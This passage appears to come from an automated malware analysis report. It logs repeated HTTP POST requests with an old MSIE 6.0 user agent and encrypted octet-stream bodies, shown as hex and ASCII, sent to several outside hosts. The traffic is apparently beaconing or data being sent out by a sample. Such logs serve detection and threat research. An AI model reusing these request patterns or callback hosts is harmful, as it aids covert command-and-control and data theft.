45 46 6e 6f 41 75 63 79 6b 50 4b 2f 64 4b 55 69 41 2f 66 33 4e 39 38 2f 32 2b 43 70 45 75 4b 6f 75 36 78 64 59 62 6c 55 7a 6f 58 37 41 55 70 66 49 63 6c 72 4e 41 35 4a 57 5a 57 52 56 67 41 56 69 53 38 4b 31 30 58 49 48 48 51 43 65 52 30 5a 39 78 51 63 4b 56 38 77 59 79 58 4c 71 6f 3d Data Ascii: JE/qtAjzJQl3AI9hS3r5jXt7dNaQ0qllvJaMPlF0cUq1qWovoKTfPpcDxhOp2rZZKV6jyxaYyt2w+lOlPk40IcF90bCaPQ8soP/7UPpa/2q6RTZuRSkUCsdyZaObsoDKa0cnGY/lxBV3/SU0AGtRVA0uNPVkfDM1La21iWV/iFueYMjF0Df1SK1WR7Y1TNcGZ5JhHDOvM7pcf0DGhx2xPrscBMxDRHTOzmhRqAl78rfvlZ73tyjg7tYQfDAUHfCXAOWzfYZJiz5qqEUMwrSEwPHN0CEP7rALIlFuBaBsmJrbpoSQHURszxiOdrYmqtzuTV2ZNStGRlxnBf5UP2rRn/2JK7qX6jAxJ8Q7edwNpIDRflf7xZPLBjbA4x3IyxC1eWaR2SdPyYGdTAGTMVBQzv2ELPcrB0oRvXbT/zFHwnINWK7DDaoE9duK/ex5gnISAyq5cC+6PNuq6EFnoAucykPK/dKUiA/f3N98/2+CpEuKou6xdYblUzoX7AUpfIclrNA5JWZWRVgAViS8K10XIHHQCeR0Z9xQcKV8wYyXLqo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 536User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.abdg.comCache-Control: no-cacheData Raw: 6e 77 37 75 44 70 51 76 4d 51 6e 6a 35 72 45 4b 62 31 56 58 38 75 66 44 51 62 6f 4d 47 48 33 55 43 48 61 33 38 6d 64 31 56 56 54 4c 47 2f 76 35 6e 56 6a 48 47 69 36 61 48 56 5a 63 58 39 53 35 4f 42 56 6b 7a 5a 35 32 2f 63 6f 74 74 35 6d 55 61 79 6f 33 35 76 68 41 4e 4e 47 65 36 4a 4e 72 68 55 69 5a 30 34 68 38 41 34 43 5a 43 70 2b 67 6e 63 77 6f 37 42 75 71 4f 45 41 70 31 65 45 4e 78 61 73 55 68 75 67 74 6f 54 5a 6c 6a 75 75 4b 64 77 42 78 7a 6f 2b 6d 2b 6b 75 74 68 61 76 6f 69 65 41 31 6a 71 6f 58 49 66 6e 77 39 5a 44 6a 46 62 71 72 47 48 33 30 33 53 4d 72 42 4e 56 33 59 4e 72 4b 38 71 61 34 36 55 6b 6c 61 4f 6c 45 72 72 4e 47 54 58 6e 6a 46 46 58 34 39 43 70 49 6f 63 77 32 33 48 41 54 32 46 4c 62 78 4d 36 59 51 39 4a 6c 7a 50 50 62 48 4f 7a 41 5a 62 2f 63 53 4b 57 65 46 79 57 42 49 76 73 44 56 66 48 57 65 48 65 35 30 49 61 51 39 67 5a 2b 53 79 67 77 45 77 71 48 74 76 50 66 34 4e 33 45 57 65 6a 76 62 78 72 6b 2b 76 61 61 4f 6f 78 63 34 63 53 2f 32 4f 41 52 44 52 75 32 43 30 46 2f 39 4c 56 4c 63 74 75 4e 64 37 78 30 34 6d 35 52 45 70 4a 6d 4b 69 79 5a 69 6f 45 4b 35 6f 75 76 2b 51 4c 44 53 55 61 6d 62 70 6f 31 54 35 74 6e 56 48 66 31 4f 5a 73 63 6e 7a 79 7a 6b 70 59 77 32 2f 44 7a 52 78 67 58 32 4b 4e 47 66 6c 6d 63 50 49 45 54 34 55 2b 62 42 78 42 4f 35 2b 34 63 53 46 6c 78 6c 46 78 47 37 79 54 35 6d 54 50 54 59 4a 34 51 34 79 4d 70 48 6d 77 67 77 6f 48 7a 63 67 74 42 2b 41 73 41 2f 5a 39 7a 39 39 61 55 75 43 58 56 2b 50 71 58 6b 59 71 2f 43 53 66 78 4b 45 68 4a 56 49 53 37 31 79 6a 30 54 61 5a 48 52 56 66 73 59 7a 64 6e 6a 4a 42 64 6d 75 38 53 76 49 2b 6a 50 74 36 34 52 4f 4a 48 Data Ascii: nw7uDpQvMQnj5rEKb1VX8ufDQboMGH3UCHa38md1VVTLG/v5nVjHGi6aHVZcX9S5OBVkzZ52/cott5mUayo35vhANNGe6JNrhUiZ04h8A4CZCp+gncwo7BuqOEAp1eENxasUhugtoTZljuuKdwBxzo+m+kuthavoieA1jqoXIfnw9ZDjFbqrGH303SMrBNV3YNrK8qa46UklaOlErrNGTXnjFFX49CpIocw23HAT2FLbxM6YQ9JlzPPbHOzAZb/cSKWeFyWBIvsDVfHWeHe50IaQ9gZ+SygwEwqHtvPf4N3EWejvbxrk+vaaOoxc4cS/2OARDRu2C0F/9LVLctuNd7x04m5REpJmKiyZioEK5ouv+QLDSUambpo1T5tnVHf1OZscnzyzkpYw2/DzRxgX2KNGflmcPIET4U+bBxBO5+4cSFlxlFxG7yT5mTPTYJ4Q4yMpHmwgwoHzcgtB+AsA/Z9z99aUuCXV+PqXkYq/CSfxKEhJVIS71yj0TaZHRVfsYzdnjJBdmu8SvI+jPt64ROJH
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.mqs.com.brCache-Control: no-cacheCookie: __goc_session__=mmikjcccpacmhhypnhsmmibzvjxnzchh; _mcnc=1Data Raw: 52 6c 34 31 6b 62 55 70 46 41 6c 7a 6d 59 6d 61 48 43 2f 41 7a 61 36 2f 4e 4f 64 44 4a 38 65 44 75 65 47 55 46 4e 46 4d 44 73 42 6e 4d 57 37 6b 36 59 6f 66 49 73 4b 52 37 69 62 5a 66 75 56 65 71 61 52 45 68 58 57 30 61 75 71 6d 68 43 52 65 74 76 65 54 61 70 36 6c 42 52 6a 51 44 69 73 65 73 4c 2b 4e 43 53 45 74 53 61 73 78 43 71 79 37 75 37 54 4f 46 49 75 39 73 63 70 56 50 31 32 33 77 41 57 64 4d 33 7a 6b 45 48 75 53 75 2f 79 67 78 6b 51 4f 7a 6f 32 34 58 49 57 61 66 4d 52 68 68 6e 58 58 4a 75 72 63 53 55 6d 6f 33 67 54 67 71 67 43 51 30 72 45 4c 33 42 7a 39 4f 43 70 47 48 65 50 31 74 73 71 75 55 36 64 59 72 64 5a 45 2f 38 4d 67 76 63 2b 4f 53 42 44 76 75 7a 62 48 6e 73 58 42 53 41 54 78 5a 45 43 38 43 48 5a 2f 62 47 68 31 6a 43 62 38 6d 34 56 69 57 5a 56 77 4e 34 74 74 2b 73 42 76 68 72 4c 4e 6c 46 70 70 36 51 4c 74 4c 31 57 5a 55 4d 53 4a 2b 36 73 39 67 67 61 63 4b 32 52 43 64 57 2f 54 6d 33 58 7a 79 75 72 4a 67 4a 70 59 57 56 61 6b 78 61 2f 54 4b 57 41 63 70 36 44 38 75 66 53 76 41 33 56 51 39 4e 6b 31 4d 79 70 68 39 32 53 50 66 78 5a 74 77 6c 41 48 37 64 49 77 46 77 4c 72 48 72 4b 63 30 34 7a 34 69 58 52 4e 74 58 69 46 38 50 45 65 34 57 70 32 39 43 5a 4f 68 68 6b 53 66 42 33 62 68 50 47 68 6b 49 6b 55 57 4a 6f 4e 48 70 37 6e 49 51 64 4d 65 73 54 35 39 4e 4a 77 33 72 2b 41 35 6e 42 53 57 4f 33 51 6b 51 56 62 46 39 48 4e 74 4f 33 65 58 6a 57 43 66 33 31 6c 33 7a 70 55 36 4e 48 2f 30 64 47 4e 53 36 73 63 6e 51 33 45 64 70 65 5a 47 5a 52 43 31 4f 30 52 4b 34 37 35 66 71 32 56 59 35 79 2f 76 6f 56 6d 76 5a 68 34 62 30 57 69 64 38 35 6d 75 6d 64 75 6b 2b 2f 59 32 62 6e 48 47 72 6b 48 42 7a 62 4c 42 73 79 63 57 72 66 57 61 5a 70 77 42 50 77 79 30 36 50 2f 44 5a 4a 36 76 56 5a 61 64 39 61 42 37 37 30 78 48 68 42 4e Data Ascii: Rl41kbUpFAlzmYmaHC/Aza6/NOdDJ8eDueGUFNFMDsBnMW7k6YofIsKR7ibZfuVeqaREhXW0auqmhCRetveTap6lBRjQDisesL+NCSEtSasxCqy7u7TOFIu9scpVP123wAWdM3zkEHuSu/ygxkQOzo24XIWafMRhhnXXJurcSUmo3gTgqgCQ0rEL3Bz9OCpGHeP1tsquU6dYrdZE/8Mgvc+OSBDvuzbHnsXBSATxZEC8CHZ/bGh1jCb8m4ViWZVwN4tt+sBvhrLNlFpp6QLtL1WZUMSJ+6s9ggacK2RCdW/Tm3XzyurJgJpYWVakxa/TKWAcp6D8ufSvA3VQ9Nk1Myph92SPfxZtwlAH7dIwFwLrHrKc04z4iXRNtXiF8PEe4Wp29CZOhhkSfB3bhPGhkIkUWJoNHp7nIQdMesT59NJw3r+A5nBSWO3QkQVbF9HNtO3eXjWCf31l3zpU6NH/0dGNS6scnQ3EdpeZGZRC1O0RK475fq2VY5y/voVmvZh4b0Wid85mumduk+/Y2bnHGrkHBzbLBsycWrfWaZpwBPwy06P/DZJ6vVZad9aB770xHhBN
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 75 42 77 34 47 2f 7a 6c 4f 51 6d 4b 6c 58 31 38 70 77 6d 65 4f 34 2b 4f 54 79 43 55 77 6c 64 4d 38 46 35 6d 73 33 58 4d 53 57 62 54 35 5a 7a 71 4b 2f 49 38 6e 79 48 48 32 4f 74 77 4d 2b 55 6d 2b 6f 2b 6e 37 77 58 4a 41 58 66 36 4e 75 51 6f 72 47 48 57 78 39 6e 31 34 4d 74 7a 66 74 51 66 4c 6c 6d 58 4d 64 2f 6a 72 47 4d 51 32 35 76 47 52 6a 4e 43 34 41 51 74 50 50 54 46 77 39 7a 68 63 4a 70 5a 45 6a 72 4f 6a 5a 72 58 58 63 4b 34 45 75 2f 4c 4d 6b 62 65 32 37 54 41 52 46 55 71 74 55 53 5a 51 2f 39 6f 33 30 77 66 4c 43 56 48 66 66 49 30 43 51 59 65 44 38 45 67 46 67 6f 35 6c 53 57 68 69 45 64 6e 2f 4e 4d 35 39 67 55 78 75 43 70 57 56 69 37 2f 6b 54 77 45 4e 63 79 65 71 75 42 4b 46 69 53 33 69 75 35 49 37 47 61 4c 61 35 48 35 4c 64 5a 56 2b 6b 59 34 55 4c 70 6c 34 74 76 41 51 35 31 30 4c 33 34 78 47 72 71 58 65 54 59 38 2f 4e 62 6c 4b 37 4d 73 58 52 5a 6f 53 51 6f 57 62 42 65 73 71 4b 33 39 38 51 31 55 46 52 49 62 53 45 65 79 53 35 6a 37 63 46 68 76 5a 6e 4d 75 38 4f 78 36 56 74 2b 33 2b 70 76 51 67 30 5a 72 4b 6d 35 31 32 77 30 51 4e 55 4e 64 4e 52 69 75 38 4e 76 53 4f 31 34 43 71 33 41 7a 4e 4c 4d 78 42 37 74 50 61 69 43 71 5a 77 56 48 77 6a 4d 45 4c 51 42 56 79 72 4c 50 78 4c 4f 6b 33 79 33 68 6a 47 72 4f 77 59 36 38 69 62 6b 56 37 59 72 66 4b 33 54 31 38 37 5a 33 4d 30 79 62 62 6b 61 35 79 4c 71 42 32 63 6e 4a 39 65 30 55 41 48 50 47 66 41 79 74 58 6c 67 75 32 73 48 36 79 2b 72 61 71 56 64 64 54 55 69 4d 53 72 72 51 78 6a 39 54 61 6e 65 55 51 4f 5a 7a 4d 31 64 49 4f 51 43 72 49 4e 41 52 56 4a 42 45 73 33 74 2f 6c 36 2b 2b 47 31 69 65 35 43 46 4e 4f 57 58 5a 31 6c 70 61 46 62 67 4e 32 53 56 59 4d 71 61 53 38 41 72 4c 57 2b 2f 38 4a 57 41 69 76 4c 73 78 Data Ascii: uBw4G/zlOQmKlX18pwmeO4+OTyCUwldM8F5ms3XMSWbT5ZzqK/I8nyHH2OtwM+Um+o+n7wXJAXf6NuQorGHWx9n14MtzftQfLlmXMd/jrGMQ25vGRjNC4AQtPPTFw9zhcJpZEjrOjZrXXcK4Eu/LMkbe27TARFUqtUSZQ/9o30wfLCVHffI0CQYeD8EgFgo5lSWhiEdn/NM59gUxuCpWVi7/kTwENcyequBKFiS3iu5I7GaLa5H5LdZV+kY4ULpl4tvAQ510L34xGrqXeTY8/NblK7MsXRZoSQoWbBesqK398Q1UFRIbSEeyS5j7cFhvZnMu8Ox6Vt+3+pvQg0ZrKm512w0QNUNdNRiu8NvSO14Cq3AzNLMxB7tPaiCqZwVHwjMELQBVyrLPxLOk3y3hjGrOwY68ibkV7YrfK3T187Z3M0ybbka5yLqB2cnJ9e0UAHPGfAytXlgu2sH6y+raqVddTUiMSrrQxj9TaneUQOZzM1dIOQCrINARVJBEs3t/l6++G1ie5CFNOWXZ1lpaFbgN2SVYMqaS8ArLW+/8JWAivLsx
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.xaicom.esCache-Control: no-cacheData Raw: 75 42 77 34 47 2f 7a 6c 4f 51 6d 4b 6c 58 31 38 70 77 6d 65 4f 34 2b 4f 54 79 43 55 77 6c 64 4d 38 46 35 6d 73 33 58 4d 53 57 62 54 35 5a 7a 71 4b 2f 49 38 6e 79 48 48 32 4f 74 77 4d 2b 55 6d 2b 6f 2b 6e 37 77 58 4a 41 58 66 36 4e 75 51 6f 72 47 48 57 78 39 6e 31 34 4d 74 7a 66 74 51 66 4c 6c 6d 58 4d 64 2f 6a 72 47 4d 51 32 35 76 47 52 6a 4e 43 34 41 51 74 50 50 54 46 77 39 7a 68 63 4a 70 5a 45 6a 72 4f 6a 5a 72 58 58 63 4b 34 45 75 2f 4c 4d 6b 62 65 32 37 54 41 52 46 55 71 74 55 53 5a 51 2f 39 6f 33 30 77 66 4c 43 56 48 66 66 49 30 43 51 59 65 44 38 45 67 46 67 6f 35 6c 53 57 68 69 45 64 6e 2f 4e 4d 35 39 67 55 78 75 43 70 57 56 69 37 2f 6b 54 77 45 4e 63 79 65 71 75 42 4b 46 69 53 33 69 75 35 49 37 47 61 4c 61 35 48 35 4c 64 5a 56 2b 6b 59 34 55 4c 70 6c 34 74 76 41 51 35 31 30 4c 33 34 78 47 72 71 58 65 54 59 38 2f 4e 62 6c 4b 37 4d 73 58 52 5a 6f 53 51 6f 57 62 42 65 73 71 4b 33 39 38 51 31 55 46 52 49 62 53 45 65 79 53 35 6a 37 63 46 68 76 5a 6e 4d 75 38 4f 78 36 56 74 2b 33 2b 70 76 51 67 30 5a 72 4b 6d 35 31 32 77 30 51 4e 55 4e 64 4e 52 69 75 38 4e 76 53 4f 31 34 43 71 33 41 7a 4e 4c 4d 78 42 37 74 50 61 69 43 71 5a 77 56 48 77 6a 4d 45 4c 51 42 56 79 72 4c 50 78 4c 4f 6b 33 79 33 68 6a 47 72 4f 77 59 36 38 69 62 6b 56 37 59 72 66 4b 33 54 31 38 37 5a 33 4d 30 79 62 62 6b 61 35 79 4c 71 42 32 63 6e 4a 39 65 30 55 41 48 50 47 66 41 79 74 58 6c 67 75 32 73 48 36 79 2b 72 61 71 56 64 64 54 55 69 4d 53 72 72 51 78 6a 39 54 61 6e 65 55 51 4f 5a 7a 4d 31 64 49 4f 51 43 72 49 4e 41 52 56 4a 42 45 73 33 74 2f 6c 36 2b 2b 47 31 69 65 35 43 46 4e 4f 57 58 5a 31 6c 70 61 46 62 67 4e 32 53 56 59 4d 71 61 53 38 41 72 4c 57 2b 2f 38 4a 57 41 69 76 4c 73 78 Data Ascii: uBw4G/zlOQmKlX18pwmeO4+OTyCUwldM8F5ms3XMSWbT5ZzqK/I8nyHH2OtwM+Um+o+n7wXJAXf6NuQorGHWx9n14MtzftQfLlmXMd/jrGMQ25vGRjNC4AQtPPTFw9zhcJpZEjrOjZrXXcK4Eu/LMkbe27TARFUqtUSZQ/9o30wfLCVHffI0CQYeD8EgFgo5lSWhiEdn/NM59gUxuCpWVi7/kTwENcyequBKFiS3iu5I7GaLa5H5LdZV+kY4ULpl4tvAQ510L34xGrqXeTY8/NblK7MsXRZoSQoWbBesqK398Q1UFRIbSEeyS5j7cFhvZnMu8Ox6Vt+3+pvQg0ZrKm512w0QNUNdNRiu8NvSO14Cq3AzNLMxB7tPaiCqZwVHwjMELQBVyrLPxLOk3y3hjGrOwY68ibkV7YrfK3T187Z3M0ybbka5yLqB2cnJ9e0UAHPGfAytXlgu2sH6y+raqVddTUiMSrrQxj9TaneUQOZzM1dIOQCrINARVJBEs3t/l6++G1ie5CFNOWXZ1lpaFbgN2SVYMqaS8ArLW+/8JWAivLsx
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 564User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.sjbs.orgCache-Control: no-cacheData Raw: 32 4e 56 42 47 46 7a 4e 4f 51 6b 59 65 65 73 50 68 77 6b 74 79 75 2f 49 5a 56 52 30 66 62 50 6c 55 41 79 41 57 51 2b 70 2f 76 47 41 6a 51 74 55 53 36 52 6c 6e 4c 6b 51 2b 42 46 6d 6b 4a 68 41 57 65 38 6a 66 39 53 4b 32 69 31 32 4d 38 38 43 44 33 70 66 4e 4a 2b 4b 42 61 2f 53 34 65 70 42 6f 47 35 37 2b 32 2b 61 39 50 74 6f 57 50 39 33 79 6d 74 4d 34 6c 37 43 77 44 69 4d 4d 74 30 2f 4e 50 49 51 55 30 6a 78 53 61 30 41 64 76 69 4f 35 34 4b 61 58 70 59 35 37 46 69 6d 37 62 39 50 6e 71 6a 41 5a 73 66 73 2f 71 45 43 73 4d 37 68 54 44 48 74 65 61 7a 4c 70 61 4e 6f 73 4a 6c 43 34 70 62 30 63 77 74 4b 6a 65 68 4c 6c 51 6b 69 35 73 4e 7a 32 61 2f 48 36 48 4a 31 44 31 32 2f 75 61 2b 2b 61 66 63 77 31 49 7a 47 6b 79 37 71 59 74 70 6e 37 33 32 67 30 67 76 6b 62 4e 31 6b 4e 54 51 53 65 62 4f 2f 4b 62 6a 6c 70 45 45 41 54 79 6e 78 33 58 35 71 70 70 30 75 39 4d 59 69 50 59 4a 6e 76 62 46 34 4c 74 7a 78 78 44 4e 6e 78 39 74 7a 6b 71 71 76 48 4a 64 4e 64 4c 67 62 59 57 6d 5a 2f 57 41 59 58 72 6d 4a 54 6e 71 66 72 69 65 61 2f 36 2b 4c 73 68 52 64 4f 42 38 35 76 50 7a 37 76 32 79 5a 77 43 38 6b 75 47 6d 74 68 45 38 39 43 4c 49 46 59 61 56 42 4a 38 64 50 2f 30 59 4a 44 46 74 44 34 77 64 44 46 6f 63 66 63 76 45 50 53 74 4d 4c 68 78 54 31 2b 56 35 37 2b 38 72 65 34 77 6d 65 31 4a 47 66 62 42 57 37 53 2b 35 73 67 79 2b 71 72 56 79 61 46 7a 78 69 64 35 32 33 4f 33 4b 49 45 4c 37 6f 5a 73 72 63 64 72 7a 61 74 7a 45 6a 73 6e 4f 5a 42 6b 6f 77 56 6f 51 39 6c 51 47 50 39 79 46 37 56 30 51 75 4a 46 64 50 39 42 41 6d 69 6e 41 34 66 73 34 59 72 50 75 42 6b 68 74 43 6b 52 53 2b 34 62 68 53 4e 58 69 66 4e 6a 42 74 46 30 58 61 71 4b 73 4c 30 30 4a 49 4e 51 33 78 2b 44 31 33 33 6b 4c 6d 50 51 3d 3d Data Ascii: 2NVBGFzNOQkYeesPhwktyu/IZVR0fbPlUAyAWQ+p/vGAjQtUS6RlnLkQ+BFmkJhAWe8jf9SK2i12M88CD3pfNJ+KBa/S4epBoG57+2+a9PtoWP93ymtM4l7CwDiMMt0/NPIQU0jxSa0AdviO54KaXpY57Fim7b9PnqjAZsfs/qECsM7hTDHteazLpaNosJlC4pb0cwtKjehLlQki5sNz2a/H6HJ1D12/ua++afcw1IzGky7qYtpn732g0gvkbN1kNTQSebO/KbjlpEEATynx3X5qpp0u9MYiPYJnvbF4LtzxxDNnx9tzkqqvHJdNdLgbYWmZ/WAYXrmJTnqfriea/6+LshRdOB85vPz7v2yZwC8kuGmthE89CLIFYaVBJ8dP/0YJDFtD4wdDFocfcvEPStMLhxT1+V57+8re4wme1JGfbBW7S+5sgy+qrVyaFzxid523O3KIEL7oZsrcdrzatzEjsnOZBkowVoQ9lQGP9yF7V0QuJFdP9BAminA4fs4YrPuBkhtCkRS+4bhSNXifNjBtF0XaqKsL00JINQ3x+D133kLmPQ==
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 556User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.naoi-a.comCache-Control: no-cacheData Raw: 4a 45 2f 71 74 41 6a 7a 4a 51 6c 33 41 49 39 68 53 33 72 35 6a 58 74 37 64 4e 61 51 30 71 6c 6c 76 4a 61 4d 50 6c 46 30 63 55 71 31 71 57 6f 76 6f 4b 54 66 50 70 63 44 78 68 4f 70 32 72 5a 5a 4b 56 36 6a 79 78 61 59 79 74 32 77 2b 6c 4f 6c 50 6b 34 30 49 63 46 39 30 62 43 61 50 51 38 73 6f 50 2f 37 55 50 70 61 2f 32 71 36 52 54 5a 75 52 53 6b 55 43 73 64 79 5a 61 4f 62 73 6f 44 4b 61 30 63 6e 47 59 2f 6c 78 42 56 33 2f 53 55 30 41 47 74 52 56 41 30 75 4e 50 56 6b 66 44 4d 31 4c 61 32 31 69 57 56 2f 69 46 75 65 59 4d 6a 46 30 44 66 31 53 4b 31 57 52 37 59 31 54 4e 63 47 5a 35 4a 68 48 44 4f 76 4d 37 70 63 66 30 44 47 68 78 32 78 50 72 73 63 42 4d 78 44 52 48 54 4f 7a 6d 68 52 71 41 6c 37 38 72 66 76 6c 5a 37 33 74 79 6a 67 37 74 59 51 66 44 41 55 48 66 43 58 41 4f 57 7a 66 59 5a 4a 69 7a 35 71 71 45 55 4d 77 72 53 45 77 50 48 4e 30 43 45 50 37 72 41 4c 49 6c 46 75 42 61 42 73 6d 4a 72 62 70 6f 53 51 48 55 52 73 7a 78 69 4f 64 72 59 6d 71 74 7a 75 54 56 32 5a 4e 53 74 47 52 6c 78 6e 42 66 35 55 50 32 72 52 6e 2f 32 4a 4b 37 71 58 36 6a 41 78 4a 38 51 37 65 64 77 4e 70 49 44 52 66 6c 66 37 78 5a 50 4c 42 6a 62 41 34 78 33 49 79 78 43 31 65 57 61 52 32 53 64 50 79 59 47 64 54 41 47 54 4d 56 42 51 7a 76 32 45 4c 50 63 72 42 30 6f 52 76 58 62 54 2f 7a 46 48 77 6e 49 4e 57 4b 37 44 44 61 6f 45 39 64 75 4b 2f 65 78 35 67 6e 49 53 41 79 71 35 63 43 2b 36 50 4e 75 71 36 45 46 6e 6f 41 75 63 79 6b 50 4b 2f 64 4b 55 69 41 2f 66 33 4e 39 38 2f 32 2b 43 70 45 75 4b 6f 75 36 78 64 59 62 6c 55 7a 6f 58 37 41 55 70 66 49 63 6c 72 4e 41 35 4a 57 5a 57 52 56 67 41 56 69 53 38 4b 31 30 58 49 48 48 51 43 65 52 30 5a 39 78 51 63 4b 56 38 77 59 79 58 4c 71 6f 3d Data Ascii: JE/qtAjzJQl3AI9hS3r5jXt7dNaQ0qllvJaMPlF0cUq1qWovoKTfPpcDxhOp2rZZKV6jyxaYyt2w+lOlPk40IcF90bCaPQ8soP/7UPpa/2q6RTZuRSkUCsdyZaObsoDKa0cnGY/lxBV3/SU0AGtRVA0uNPVkfDM1La21iWV/iFueYMjF0Df1SK1WR7Y1TNcGZ5JhHDOvM7pcf0DGhx2xPrscBMxDRHTOzmhRqAl78rfvlZ73tyjg7tYQfDAUHfCXAOWzfYZJiz5qqEUMwrSEwPHN0CEP7rALIlFuBaBsmJrbpoSQHURszxiOdrYmqtzuTV2ZNStGRlxnBf5UP2rRn/2JK7qX6jAxJ8Q7edwNpIDRflf7xZPLBjbA4x3IyxC1eWaR2SdPyYGdTAGTMVBQzv2ELPcrB0oRvXbT/zFHwnINWK7DDaoE9duK/ex5gnISAyq5cC+6PNuq6EFnoAucykPK/dKUiA/f3N98/2+CpEuKou6xdYblUzoX7AUpfIclrNA5JWZWRVgAViS8K10XIHHQCeR0Z9xQcKV8wYyXLqo=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 560User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.hummer.huCache-Control: no-cacheData Raw: 75 31 45 36 70 71 4e 70 50 67 6e 78 42 52 48 44 4b 6b 4b 63 34 38 78 37 49 70 44 4a 75 4c 73 76 68 35 6d 77 34 51 39 6a 57 61 61 38 6f 61 4a 48 6e 6a 57 50 72 51 75 77 31 36 56 4b 63 65 68 2f 64 45 30 63 77 43 31 30 66 64 32 59 6a 6c 4a 66 48 78 37 74 52 6b 47 2b 4d 56 48 34 6d 54 58 43 75 33 4c 79 4b 74 53 50 63 58 71 44 35 48 4a 35 49 76 73 79 59 36 6e 32 51 62 2b 33 5a 35 52 71 71 31 79 64 30 32 37 5a 73 53 71 73 71 55 44 35 66 6c 55 34 43 52 6a 6d 2f 73 66 51 74 34 75 41 69 5a 64 34 6a 51 30 4f 2f 76 58 66 41 4e 4d 32 6d 2f 37 72 54 63 4a 51 47 55 55 4d 31 61 73 34 2f 76 63 66 37 51 71 4f 77 43 71 64 4f 6f 71 5a 5a 6a 61 50 37 46 78 59 73 61 56 2f 72 30 58 42 4e 79 46 70 7a 33 68 5a 75 36 51 4c 36 46 6b 49 51 2b 6b 78 56 6c 6a 48 69 73 38 49 7a 6d 70 73 4f 41 30 78 41 49 6e 6f 79 6f 37 78 44 34 2b 70 43 43 34 6f 69 4e 73 6e 75 79 79 6b 54 74 79 6a 41 63 35 37 6e 35 79 62 62 6b 41 45 63 39 61 6f 64 52 45 39 65 4b 2b 6e 56 68 2f 6b 66 31 69 42 4d 63 77 62 31 45 79 72 48 65 45 33 43 31 49 2f 33 4a 45 39 6c 36 63 4f 33 6f 43 6d 6d 71 44 4f 53 78 6c 4d 41 41 71 63 56 4c 41 37 52 36 63 79 74 66 52 69 6d 72 57 75 69 63 57 66 74 2f 72 61 54 64 36 36 4c 49 45 6b 72 74 65 47 68 4d 34 2b 46 68 45 30 45 69 74 73 53 6f 36 56 7a 52 73 53 2b 47 2b 71 2f 55 49 76 2f 66 4f 63 64 47 34 41 67 2f 75 35 41 34 50 35 68 35 67 50 43 72 6a 75 77 67 41 41 4d 35 34 66 61 6d 31 35 41 75 77 5a 44 53 76 47 54 79 62 68 70 33 32 70 64 6f 65 6a 2b 53 39 72 4e 59 63 6c 61 57 57 43 79 70 6d 31 6a 39 4c 45 42 59 6a 53 32 49 68 46 76 4c 67 45 75 57 64 65 38 69 30 65 36 70 53 73 65 35 6e 64 45 46 59 65 51 51 2f 6c 6e 53 57 6e 70 56 59 59 56 5a 69 32 75 53 74 2f 52 6f 4d 59 78 45 73 3d Data Ascii: u1E6pqNpPgnxBRHDKkKc48x7IpDJuLsvh5mw4Q9jWaa8oaJHnjWPrQuw16VKceh/dE0cwC10fd2YjlJfHx7tRkG+MVH4mTXCu3LyKtSPcXqD5HJ5IvsyY6n2Qb+3Z5Rqq1yd027ZsSqsqUD5flU4CRjm/sfQt4uAiZd4jQ0O/vXfANM2m/7rTcJQGUUM1as4/vcf7QqOwCqdOoqZZjaP7FxYsaV/r0XBNyFpz3hZu6QL6FkIQ+kxVljHis8IzmpsOA0xAInoyo7xD4+pCC4oiNsnuyykTtyjAc57n5ybbkAEc9aodRE9eK+nVh/kf1iBMcwb1EyrHeE3C1I/3JE9l6cO3oCmmqDOSxlMAAqcVLA7R6cytfRimrWuicWft/raTd66LIEkrteGhM4+FhE0EitsSo6VzRsS+G+q/UIv/fOcdG4Ag/u5A4P5h5gPCrjuwgAAM54fam15AuwZDSvGTybhp32pdoej+S9rNYclaWWCypm1j9LEBYjS2IhFvLgEuWde8i0e6pSse5ndEFYeQQ/lnSWnpVYYVZi2uSt/RoMYxEs=
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 592User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora.ecnet.jpCache-Control: no-cacheData Raw: 51 49 6a 31 57 56 65 66 4d 77 6b 56 70 77 69 45 52 72 51 4a 31 61 43 66 72 35 4f 4e 63 75 45 5a 65 37 41 64 31 61 70 53 57 42 39 78 2f 65 35 57 45 4f 37 71 59 48 6a 67 30 64 2b 49 51 66 66 53 30 32 58 36 45 49 39 2b 57 55 2b 44 4a 39 76 66 59 6f 4b 6f 39 50 66 4e 32 6f 71 68 30 47 54 58 43 58 49 57 59 75 6c 61 6c 33 54 49 47 70 7a 44 35 49 6d 2f 76 2b 63 53 57 42 75 38 50 77 6a 33 35 70 70 4e 4d 67 38 61 71 48 68 33 6f 6e 6c 46 61 43 61 6b 65 4d 6b 59 78 51 4a 56 58 6d 71 79 4e 55 32 49 68 2b 77 2f 6c 64 36 54 4b 72 50 6a 33 75 30 75 37 50 7a 33 61 67 6e 57 32 7a 56 4d 36 5a 6c 2f 4c 41 57 2b 49 49 63 53 76 30 7a 75 70 68 62 51 43 76 